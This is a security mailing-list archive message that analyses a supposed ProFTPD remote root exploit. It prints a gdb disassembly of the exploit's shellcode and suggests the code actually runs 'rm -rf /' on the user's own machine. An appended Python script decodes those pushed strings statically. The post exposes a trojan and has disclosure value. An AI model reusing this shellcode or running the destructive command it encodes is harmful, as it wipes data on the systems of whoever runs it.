Open Source and information security mailing list archives
Message-ID: <20031024152758.GA8424@netnation.com>
From: sim at netnation.com (Simon Kirby)
Subject: ProFTPD-1.2.9rc2 remote root exploit

On Fri, Oct 24, 2003 at 03:36:17PM +0200, Andreas Gietl wrote:

> On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:
> 
> this seems to delete sth on the local harddisk. anybody else seeing this 
> effect?

(gdb) disassemble &sc
Dump of assembler code for function sc:
0x0804a1a0 <sc+0>:      xor    %eax,%eax
0x0804a1a2 <sc+2>:      push   %eax
0x0804a1a3 <sc+3>:      push   $0x582f2066
0x0804a1a8 <sc+8>:      push   $0x722d206d
0x0804a1ad <sc+13>:     push   $0x7258632d
0x0804a1b2 <sc+18>:     push   $0x41414141
0x0804a1b7 <sc+23>:     push   $0x41414141
0x0804a1bc <sc+28>:     push   $0x41414141
0x0804a1c1 <sc+33>:     push   $0x41414141
0x0804a1c6 <sc+38>:     push   $0x4368732f
0x0804a1cb <sc+43>:     push   $0x6e69622f
0x0804a1d0 <sc+48>:     xor    %eax,%eax
0x0804a1d2 <sc+50>:     mov    %al,0x7(%esp,1)
0x0804a1d6 <sc+54>:     mov    %al,0x1a(%esp,1)
0x0804a1da <sc+58>:     mov    %al,0x23(%esp,1)
0x0804a1de <sc+62>:     mov    %esp,0x8(%esp,1)
0x0804a1e2 <sc+66>:     xor    %ebx,%ebx
0x0804a1e4 <sc+68>:     lea    0x18(%esp,1),%ebx
0x0804a1e8 <sc+72>:     mov    %ebx,0xc(%esp,1)
0x0804a1ec <sc+76>:     xor    %ebx,%ebx
0x0804a1ee <sc+78>:     lea    0x1b(%esp,1),%ebx
0x0804a1f2 <sc+82>:     mov    %ebx,0x10(%esp,1)
0x0804a1f6 <sc+86>:     mov    %eax,0x14(%esp,1)
0x0804a1fa <sc+90>:     xor    %ebx,%ebx
0x0804a1fc <sc+92>:     mov    %esp,%ebx
0x0804a1fe <sc+94>:     lea    0x8(%esp,1),%ecx
0x0804a202 <sc+98>:     xor    %edx,%edx
0x0804a204 <sc+100>:    lea    0x14(%esp,1),%edx
0x0804a208 <sc+104>:    mov    $0xb,%al
0x0804a20a <sc+106>:    int    $0x80
0x0804a20c <sc+108>:    xor    %ebx,%ebx
0x0804a20e <sc+110>:    xor    %eax,%eax
0x0804a210 <sc+112>:    inc    %eax
0x0804a211 <sc+113>:    int    $0x80
0x0804a213 <sc+115>:    add    %al,(%eax)
End of assembler dump.

Demangles "rm -rf /" and execs it?

Simon-
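
The guess above can be checked statically, without executing the bytes. This is an added example, not part of the original post: it replays only the push and `mov %al` instructions from the dump, assumes %eax is zero (as the preceding xor leaves it), and reads the strings at the offsets the dump stores into the argv slots. The function names are illustrative.

```python
import re
import struct

# Relevant lines copied from the gdb dump in the post above (addresses dropped).
DUMP = """\
xor    %eax,%eax
push   %eax
push   $0x582f2066
push   $0x722d206d
push   $0x7258632d
push   $0x41414141
push   $0x41414141
push   $0x41414141
push   $0x41414141
push   $0x4368732f
push   $0x6e69622f
xor    %eax,%eax
mov    %al,0x7(%esp,1)
mov    %al,0x1a(%esp,1)
mov    %al,0x23(%esp,1)
"""

PUSH_IMM = re.compile(r"push\s+\$0x([0-9a-f]+)")
PUSH_EAX = re.compile(r"push\s+%eax")
STORE_AL = re.compile(r"mov\s+%al,0x([0-9a-f]+)\(%esp,1\)")

def rebuild_stack(dump):
    """Replay pushes and byte stores; return memory starting at the final %esp."""
    stack = bytearray()
    for line in dump.splitlines():
        if m := PUSH_IMM.search(line):
            # Each push lands below the previous one, stored little-endian.
            stack[:0] = struct.pack("<I", int(m.group(1), 16))
        elif PUSH_EAX.search(line):
            stack[:0] = b"\0\0\0\0"          # assumption: %eax is 0 after the xor
        elif m := STORE_AL.search(line):
            stack[int(m.group(1), 16)] = 0   # %al is 0: placeholder byte becomes NUL
    return bytes(stack)

def c_string(mem, off):
    """Read the NUL-terminated ASCII string starting at offset off."""
    return mem[off:mem.index(b"\0", off)].decode("ascii")

def decode_argv(dump):
    mem = rebuild_stack(dump)
    # %esp, 0x18(%esp) and 0x1b(%esp) are the pointers the dump writes
    # to 0x8/0xc/0x10(%esp), i.e. argv[0..2] for the int $0x80 call with %al = 0xb.
    return [c_string(mem, off) for off in (0x0, 0x18, 0x1b)]

if __name__ == "__main__":
    print(decode_argv(DUMP))
```

The "C" and "X" bytes in the pushed constants are placeholders that the three `mov %al` stores overwrite with NULs, which is why the strings do not show up in a plain `strings` pass over the binary.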

